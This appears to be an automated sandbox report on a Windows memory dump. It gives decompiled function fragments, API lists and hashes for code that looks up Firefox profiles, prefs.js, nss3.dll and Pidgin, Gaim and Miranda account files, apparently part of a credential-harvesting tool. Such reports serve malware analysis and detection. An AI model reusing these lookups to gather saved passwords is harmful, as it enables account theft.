Opcode ID: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
Instruction ID: dc7a302430b06bbc29ce8331a0d654e54ba56492e0c60a2da2e35593be10561b
Opcode Fuzzy Hash: fe18d8dd2c8264a7d2d3ac72613768907538146584e0663d827c53e1f55572e9
Instruction Fuzzy Hash: 7B31FBA580D2C4AED7219F6880557EEFFA14F22305F1886DAC0D447383C22C9BCAD75A

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA56, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040EA89
strlen.MSVCRT ref: 0040EA8F
strlen.MSVCRT ref: 0040EA9C

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

accounts.xml, xrefs: 0040EA94, 0040EA99, 0040EAAC

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_mbscat_mbscpymemset
String ID: accounts.xml
API String ID: 581844971-666780623
Opcode ID: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
Instruction ID: 3a6749a91d87314aa81efbea2023e77c1fe97455d9ba7aea10baf3c7dddfb932
Opcode Fuzzy Hash: 3b236e653348da5417edaa74ab4b2c2d6336b1da36662295ef381eeb4047c0c7
Instruction Fuzzy Hash: 9C210471A041186BCB10EB66DC416DFB7F8AF55314F0484BBE009E7142DBB8EA958FE8

Uniqueness

Uniqueness Score: -1.00%

Function 0040EB3D, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040EB70
strlen.MSVCRT ref: 0040EB76
strlen.MSVCRT ref: 0040EB83

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

accounts.xml, xrefs: 0040EB7B, 0040EB80, 0040EB93

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_mbscat_mbscpymemset
String ID: accounts.xml
API String ID: 581844971-666780623
Opcode ID: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
Instruction ID: f45e0dada1ac7c46e734b25b908a600237734d5f3cbc55dd7ef5ba4cf50aaebb
Opcode Fuzzy Hash: 525a6947399d2dc96bd98280f09e98ebf0a88ac4f7fc2c84a32f5a3fc94ac3d7
Instruction Fuzzy Hash: AD21F5719041185BDB11EB26DC41ACA77BC5F51314F0484BBA508E7141DBB8EAD68FD8

Uniqueness

Uniqueness Score: -1.00%

Function 00407364, Relevance: 6.1, APIs: 4, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00407364(void* __eax, char* _a4, int _a8) {
				void* __edi;
				intOrPtr _t30;
				intOrPtr _t33;
				intOrPtr _t44;
				intOrPtr _t52;
				intOrPtr* _t54;
				intOrPtr* _t55;
				void* _t56;

				_t56 = __eax;
				if(_a8 == 0xffffffff) {
					_a8 = strlen(_a4);
				}
				_t44 =  *((intOrPtr*)(_t56 + 4));
				_t52 = _t44 + _a8 + 1;
				_t30 =  *((intOrPtr*)(_t56 + 0x14));
				 *((intOrPtr*)(_t56 + 4)) = _t52;
				_t54 = _t56 + 0x10;
				if(_t52 != 0xffffffff) {
					E00406982(_t56, _t52, _t54, 1, _t30);
				} else {
					0x413de6( *_t54);
				}
				_t53 =  *(_t56 + 0x1c);
				_t33 =  *((intOrPtr*)(_t56 + 0x18));
				_t55 = _t56 + 0xc;
				if( *(_t56 + 0x1c) != 0xffffffff) {
					E00406982(_t56 + 8, _t53, _t55, 4, _t33);
				} else {
					0x413de6( *_t55);
				}
				memcpy( *((intOrPtr*)(_t56 + 0x10)) + _t44, _a4, _a8);
				 *((char*)( *((intOrPtr*)(_t56 + 0x10)) + _t44 + _a8)) = 0;
				 *((intOrPtr*)( *_t55 +  *(_t56 + 0x1c) * 4)) = _t44;
				 *(_t56 + 0x1c) =  *(_t56 + 0x1c) + 1;
				_t27 =  *(_t56 + 0x1c) - 1; // -1
				return _t27;
			}

0x0040736e
0x00407370
0x0040737b
0x0040737b
0x0040737e
0x00407384
0x0040738b
0x0040738e
0x00407391
0x00407394
0x004073a4
0x00407396
0x00407398
0x00407398
0x004073aa
0x004073b0
0x004073b4
0x004073b7
0x004073c8
0x004073b9
0x004073bb
0x004073bb
0x004073db
0x004073e8
0x004073f4
0x004073f7
0x004073fe
0x00407404

APIs

strlen.MSVCRT ref: 00407375

Part of subcall function 00406982: malloc.MSVCRT ref: 0040699E
Part of subcall function 00406982: memcpy.MSVCRT ref: 004069B6
Part of subcall function 00406982: ??3@YAXPAX@Z.MSVCRT ref: 004069BF

??3@YAXPAX@Z.MSVCRT ref: 00407398
??3@YAXPAX@Z.MSVCRT ref: 004073BB
memcpy.MSVCRT ref: 004073DB

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@$memcpy$mallocstrlen
String ID:
API String ID: 1171893557-0
Opcode ID: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
Instruction ID: d47861f91907e87d10e443503ad883c0cefe0bd36095b640ea2ff485cde935f6
Opcode Fuzzy Hash: 5eae7e510f03a6352586b84f7b01f0a0acff8e55822a1d9b26e8cfb98cebd805
Instruction Fuzzy Hash: 53218C71204604AFD730DF18E881996B7F5EF04324B208A2EFC6A9B6D1C735FA59CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00407944, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00407944(void** __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _t21;
				signed int _t23;
				void* _t24;
				signed int _t31;
				void* _t32;
				void* _t33;
				void* _t44;
				signed int _t46;
				void* _t48;
				signed int _t51;
				int _t52;
				void** _t53;
				void* _t58;

				_t53 = __esi;
				_t1 =  &(_t53[1]); // 0x0
				_t51 =  *_t1;
				_t21 = 0;
				if(_t51 <= 0) {
					L4:
					_t2 =  &(_t53[2]); // 0x8
					_t33 =  *_t53;
					_t23 =  *_t2 + _t51;
					_t46 = 8;
					_t53[1] = _t23;
					_t24 = _t23 * _t46;
					0x413d5c( ~(0 | _t58 > 0x00000000) | _t24, _t32);
					_t10 =  &(_t53[1]); // 0x0
					 *_t53 = _t24;
					memset(_t24, 0,  *_t10 << 3);
					_t52 = _t51 << 3;
					memcpy( *_t53, _t33, _t52);
					if(_t33 != 0) {
						0x413d56(_t33);
					}
					 *((intOrPtr*)( *_t53 + _t52)) = _a4;
					 *((intOrPtr*)(_t52 +  *_t53 + 4)) = _a8;
				} else {
					_t44 =  *__esi;
					_t48 = _t44;
					while( *_t48 != 0) {
						_t21 = _t21 + 1;
						_t48 = _t48 + 8;
						_t58 = _t21 - _t51;
						if(_t58 < 0) {
							continue;
						} else {
							goto L4;
						}
						goto L7;
					}
					_t31 = _t21 << 3;
					 *((intOrPtr*)(_t44 + _t31)) = _a4;
					 *((intOrPtr*)(_t31 +  *_t53 + 4)) = _a8;
				}
				L7:
				return 1;
			}

0x00407944
0x00407945
0x00407945
0x00407948
0x0040794c
0x0040795f
0x0040795f
0x00407963
0x00407965
0x0040796b
0x0040796c
0x0040796f
0x00407979
0x0040797e
0x00407988
0x0040798a
0x0040798f
0x00407996
0x004079a0
0x004079a3
0x004079a8
0x004079af
0x004079b8
0x0040794e
0x0040794e
0x00407950
0x00407952
0x00407957
0x00407958
0x0040795b
0x0040795d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040795d
0x004079c8
0x004079cb
0x004079d4
0x004079d4
0x004079bd
0x004079c1

APIs

??2@YAPAXI@Z.MSVCRT ref: 00407979
memset.MSVCRT ref: 0040798A
memcpy.MSVCRT ref: 00407996
??3@YAXPAX@Z.MSVCRT ref: 004079A3

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@??3@memcpymemset
String ID:
API String ID: 1865533344-0
Opcode ID: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
Instruction ID: be4f301e428eab7478e357bf13cd6827c7edeb2881237a21e1a336ab79825493
Opcode Fuzzy Hash: da379349a0878454dd0175aad334c0a6b10e522537b17fbd02a48e17a58ffbf9
Instruction Fuzzy Hash: C8116DB1608601AFE329DF19D881A26F7E5FF88300F20892EE4DA87391D635E841CB55

Uniqueness

Uniqueness Score: -1.00%

Function 0040E4B6, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E4B6(intOrPtr _a4, char* _a8) {
				intOrPtr _v8;
				void _v275;
				char _v276;
				int _t17;
				void* _t21;

				_v8 = 1;
				_v276 = 0;
				memset( &_v275, 0, 0x104);
				_t17 = strlen(_a8);
				_t6 = strlen(0x41894c) + 1; // 0x1
				if(_t17 + _t6 >= 0x104) {
					_v276 = 0;
				} else {
					E00406B4B( &_v276, _a8, 0x41894c);
				}
				_t21 = E004069D3( &_v276);
				_t38 = _t21;
				if(_t21 != 0) {
					_v8 = E0040E293(_t38, _a4,  &_v276);
				}
				return _v8;
			}

0x0040e4d1
0x0040e4d8
0x0040e4df
0x0040e4ea
0x0040e4fd
0x0040e504
0x0040e519
0x0040e506
0x0040e510
0x0040e516
0x0040e527
0x0040e52c
0x0040e52f
0x0040e540
0x0040e540
0x0040e54a

APIs

memset.MSVCRT ref: 0040E4DF
strlen.MSVCRT ref: 0040E4EA
strlen.MSVCRT ref: 0040E4F8

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

prefs.js, xrefs: 0040E4F0, 0040E4F5, 0040E506

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_mbscat_mbscpymemset
String ID: prefs.js
API String ID: 581844971-3783873740
Opcode ID: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
Instruction ID: 18aa10c61fb3677f8c34c5df747d0d2d010b9cd1cf1f562783039ea2ec755a14
Opcode Fuzzy Hash: e695a85550e18a578563b94c74fc6493014cfdadf8041b930889a3e806ae1ffc
Instruction Fuzzy Hash: 9C01C87190011CBADB11EA95EC42BCABBAC9F0531DF1008BBE604E2181E7B49B948794

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4E9, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040D4E9(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x20a;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen("Mozilla\Profiles");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, "Mozilla\Profiles");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}

0x0040d505
0x0040d50c
0x0040d50f
0x0040d516
0x0040d524
0x0040d52e
0x0040d541
0x0040d54a
0x0040d563
0x0040d54c
0x0040d55a
0x0040d560
0x0040d567
0x0040d56f
0x0040d571
0x00000000
0x0040d571
0x0040d577

APIs

memset.MSVCRT ref: 0040D516

Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279

strlen.MSVCRT ref: 0040D52E
strlen.MSVCRT ref: 0040D53C

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

Mozilla\Profiles, xrefs: 0040D529, 0040D552

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
String ID: Mozilla\Profiles
API String ID: 2008385565-2796945589
Opcode ID: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
Instruction ID: 3c6ae931ffe100bc814a6c4c739c4374e257fa1fb59e82d364b3a540d615c615
Opcode Fuzzy Hash: 5a999460c3217843dc6f32f88e89d1702dbadaddf9eabefba75398abb63b17c1
Instruction Fuzzy Hash: 2201F07290821466D711A6699C42FCA779C4F21759F2404BBF5C5F31C2EDB899C443A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D578, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040D578(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x61e;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen(".purple");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, ".purple");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}

0x0040d594
0x0040d59b
0x0040d59e
0x0040d5a5
0x0040d5b3
0x0040d5bd
0x0040d5d0
0x0040d5d9
0x0040d5f2
0x0040d5db
0x0040d5e9
0x0040d5ef
0x0040d5f6
0x0040d5fe
0x0040d600
0x00000000
0x0040d600
0x0040d606

APIs

memset.MSVCRT ref: 0040D5A5

Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279

strlen.MSVCRT ref: 0040D5BD
strlen.MSVCRT ref: 0040D5CB

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

.purple, xrefs: 0040D5B8, 0040D5E1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
String ID: .purple
API String ID: 2008385565-1504268026
Opcode ID: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
Instruction ID: 5dc147b8957afa7b06b9bacfad0a4e1db4396cb0d3e541dfcccdd27de6d8d665
Opcode Fuzzy Hash: 2ac43bd667000255b1d56cb9d4d28ea446a45af95856c73e5f907134ba4c6b56
Instruction Fuzzy Hash: 8C0120725081146AD711A669DC42BCA779C4F21709F2404BFF5C5F71C2FEB899C543AD

Uniqueness

Uniqueness Score: -1.00%

Function 0040D607, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040D607(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x30f;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen(".gaim");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, ".gaim");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}

0x0040d623
0x0040d62a
0x0040d62d
0x0040d634
0x0040d642
0x0040d64c
0x0040d65f
0x0040d668
0x0040d681
0x0040d66a
0x0040d678
0x0040d67e
0x0040d685
0x0040d68d
0x0040d68f
0x00000000
0x0040d68f
0x0040d695

APIs

memset.MSVCRT ref: 0040D634

Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279

strlen.MSVCRT ref: 0040D64C
strlen.MSVCRT ref: 0040D65A

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

.gaim, xrefs: 0040D647, 0040D670

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
String ID: .gaim
API String ID: 2008385565-3490432478
Opcode ID: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
Instruction ID: a115bc8fa66553d394cd4cab83c679d7ef9605289ec37c5517f9616187ac7207
Opcode Fuzzy Hash: adcac243f634cd9f4ba49c533a924e47bd2570a5673518b618adaff46f672105
Instruction Fuzzy Hash: 540120729082546AD721A6699C42BCB779C4F21709F2008BFF5C8F31C2EEBC5AC543A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040D696, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040D696(void* __eax) {
				void _v267;
				char _v268;
				int _t12;
				char _t16;
				char* _t27;

				_t27 = __eax + 0x414;
				 *_t27 = 0;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				0x41223f(0x1a);
				_t12 = strlen("Miranda");
				_t6 = strlen( &_v268) + 1; // 0x1
				if(_t12 + _t6 >= 0x104) {
					 *_t27 = 0;
				} else {
					E00406B4B(_t27,  &_v268, "Miranda");
				}
				_t16 = E004069D3(_t27);
				if(_t16 == 0) {
					 *_t27 = _t16;
					return _t16;
				}
				return _t16;
			}

0x0040d6b2
0x0040d6b9
0x0040d6bc
0x0040d6c3
0x0040d6d1
0x0040d6db
0x0040d6ee
0x0040d6f7
0x0040d710
0x0040d6f9
0x0040d707
0x0040d70d
0x0040d714
0x0040d71c
0x0040d71e
0x00000000
0x0040d71e
0x0040d724

APIs

memset.MSVCRT ref: 0040D6C3

Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279

strlen.MSVCRT ref: 0040D6DB
strlen.MSVCRT ref: 0040D6E9

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

Miranda, xrefs: 0040D6D6, 0040D6FF

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$FolderPathSpecial_mbscat_mbscpymemset
String ID: Miranda
API String ID: 2008385565-4004425691
Opcode ID: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
Instruction ID: c142bb7588fded06bca0c3959130fc7bc280b220a29219a6f5312b9b0058b910
Opcode Fuzzy Hash: a1f73f7abb57728e4712774607e4362808b5bed289a3dcc15fc17451e6932546
Instruction Fuzzy Hash: 180120769081146AD721BA699C42BDA779C4F21709F2404BBF5C4F31C2EEB859C543BD

Uniqueness

Uniqueness Score: -1.00%

Function 0040623F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

_mbscpy.MSVCRT ref: 00406261
_mbscpy.MSVCRT ref: 0040629E
_mbscpy.MSVCRT ref: 004062B2
_mbscpy.MSVCRT ref: 004062C1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscpy
String ID:
API String ID: 714388716-0
Opcode ID: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
Instruction ID: dce8e19ef7dbf3e453dc58d21b67a2b53133f69bc0796553bf20bccd0e5dc17f
Opcode Fuzzy Hash: ab229b3bd327be627bfa6a8927dcfeb4b0251fbfa2f001aa23d8bafecd458d55
Instruction Fuzzy Hash: 310144769002089BCB22EBA5DC85EDB77BCAF88305F0004ABF54797141EF38A7C48B54

Uniqueness

Uniqueness Score: -1.00%

Function 0040B15B, Relevance: 6.0, APIs: 4, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040B15B(void* __esi) {
				void* _v260;
				char _v516;
				void* __ebx;
				long _t16;
				signed short _t24;
				signed short _t26;
				void* _t27;

				_t27 = __esi;
				_push(E00409445( *((intOrPtr*)(__esi + 0x390))));
				_t24 = 4;
				sprintf( &_v260, E0040876F(_t24));
				_t16 = E004099DC( *((intOrPtr*)(__esi + 0x390)), 0);
				if(_t16 > 0) {
					_t26 = 5;
					sprintf( &_v516, E0040876F(_t26));
					_t16 =  &_v260;
					0x413cf4(_t16,  &_v516, _t16);
				}
				if( *((intOrPtr*)(_t27 + 0x108)) != 0) {
					return SendMessageA( *(_t27 + 0x114), 0x401, 0,  &_v260);
				}
				return _t16;
			}

0x0040b15b
0x0040b170
0x0040b173
0x0040b181
0x0040b191
0x0040b198
0x0040b19d
0x0040b1ab
0x0040b1b7
0x0040b1be
0x0040b1c3
0x0040b1ce
0x00000000
0x0040b1e4
0x0040b1eb

APIs

Part of subcall function 0040876F: LoadStringA.USER32(00000000,00000006,00000FFF,?), ref: 00408838
Part of subcall function 0040876F: memcpy.MSVCRT ref: 00408877

sprintf.MSVCRT ref: 0040B181
SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B1E4

Part of subcall function 0040876F: _mbscpy.MSVCRT ref: 004087EA
Part of subcall function 0040876F: strlen.MSVCRT ref: 00408808

sprintf.MSVCRT ref: 0040B1AB
_mbscat.MSVCRT ref: 0040B1BE

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
String ID:
API String ID: 203655857-0
Opcode ID: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
Instruction ID: ecab945e31bd422c391273073b57af520698e657e98585e8788b6dab187b6cf3
Opcode Fuzzy Hash: 48bcd73753a3de1088a11b84d960efb43f629dc3a258219230a3a5f3ea5ed895
Instruction Fuzzy Hash: 0E0167B25003046AD721B775DC86FEB73AC6B04704F14046FB655B6182EA79EA848A68

Uniqueness

Uniqueness Score: -1.00%

Function 00405E4A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E00405E4A(char* _a4) {
				void _v267;
				char _v268;
				int _t12;
				signed int _t16;

				_v268 = 0;
				memset( &_v267, 0, 0x104);
				_t12 = strlen(_a4);
				_t5 = strlen(0x418198) + 1; // 0x1
				if(_t12 + _t5 >= 0x104) {
					_v268 = 0;
				} else {
					E00406B4B( &_v268, _a4, 0x418198);
				}
				_t16 = E004069D3( &_v268);
				asm("sbb eax, eax");
				return  ~( ~_t16);
			}

0x00405e65
0x00405e6c
0x00405e74
0x00405e86
0x00405e8f
0x00405ea4
0x00405e91
0x00405e9b
0x00405ea1
0x00405eb2
0x00405ebb
0x00405ec2

APIs

memset.MSVCRT ref: 00405E6C
strlen.MSVCRT ref: 00405E74
strlen.MSVCRT ref: 00405E81

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

nss3.dll, xrefs: 00405E79, 00405E7E, 00405E91

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_mbscat_mbscpymemset
String ID: nss3.dll
API String ID: 581844971-2492180550
Opcode ID: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
Instruction ID: 0509c7bfbc4d162460136cac1117631891986418d94c1b22c83112455de3b5d3
Opcode Fuzzy Hash: dc525abc6d6edebac6bfa9b108e260368fb5f6e693cc622c55a843e41b0e11e7
Instruction Fuzzy Hash: 44F0CD7140C1186BDB10E769DC45FDA7BAC8F61719F1000B7F589E60C1DAB8ABC546A5

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6B4, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040A6B4(intOrPtr* __ecx, intOrPtr _a4) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void* __esi;
				void* _t15;
				intOrPtr* _t24;
				char* _t26;

				_t24 = __ecx;
				_v260 = 0;
				memset( &_v259, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t15 =  *((intOrPtr*)( *_t24 + 0x20))();
				_t26 =  &_v260;
				E00409DD6(_t26, _t15);
				_push(_t26);
				sprintf( &_v516, "</%s>");
				return E004067EC(_a4,  &_v516);
			}

0x0040a6ce
0x0040a6d0
0x0040a6d7
0x0040a6e6
0x0040a6ed
0x0040a6f9
0x0040a6fd
0x0040a703
0x0040a70a
0x0040a717
0x0040a731

APIs

memset.MSVCRT ref: 0040A6D7
memset.MSVCRT ref: 0040A6ED

Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E

sprintf.MSVCRT ref: 0040A717

Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806

Strings

</%s>, xrefs: 0040A711

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
String ID: </%s>
API String ID: 3699762281-259020660
Opcode ID: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
Instruction ID: 76c63a3487c2ea4e5ea40729799977580a4d7530bed5194a5a383ad1b54ece87
Opcode Fuzzy Hash: ebb575c85aeda559d8ae490dab39b8bfe5ab3b1401c28d73b294ba1e58331789
Instruction Fuzzy Hash: EB01F97290012977D720A719CC46FDE7B6CAF55705F0400FAB50DF3142EA749B848BA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040783B, Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 35
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040783B(void* __eax, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t10;
				int _t11;
				char* _t13;
				char* _t18;
				void* _t19;
				void* _t23;

				_t19 = __eax;
				E00407930(__eax);
				_t1 = _t23 + 0x14; // 0x4042e3
				_t2 = _t19 + 0x3cc; // 0x4cb
				_t18 = _t2;
				E00406958(0x143, _t18,  *_t1);
				 *((intOrPtr*)(_t23 + 0x1c)) = _t19 + 4;
				_t10 = strlen(_t18);
				_t11 = strlen(0x417f90);
				_t13 =  *((intOrPtr*)(_t23 + 0x20));
				if(_t11 + _t10 + 1 >= 0x143) {
					 *_t13 = 0;
					return _t13;
				}
				return E00406B4B(_t13, _t18, 0x417f90);
			}

0x0040783f
0x00407841
0x00407846
0x0040784a
0x0040784a
0x00407855
0x0040785e
0x00407862
0x0040786f
0x0040787d
0x00407881
0x0040788e
0x00000000
0x0040788e
0x00000000

APIs

Part of subcall function 00407930: FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A

Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972

strlen.MSVCRT ref: 00407862
strlen.MSVCRT ref: 0040786F

Part of subcall function 00406B4B: _mbscpy.MSVCRT ref: 00406B53
Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62

Strings

B@, xrefs: 00407846
*.*, xrefs: 00407867, 0040786C, 00407883

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$CloseFind_mbscat_mbscpymemcpy
String ID: *.*$B@
API String ID: 470300861-2086290067
Opcode ID: e71b7bb2728435c35afb30c195da2c5469ab4e5e2b82df99b22387a96c315497
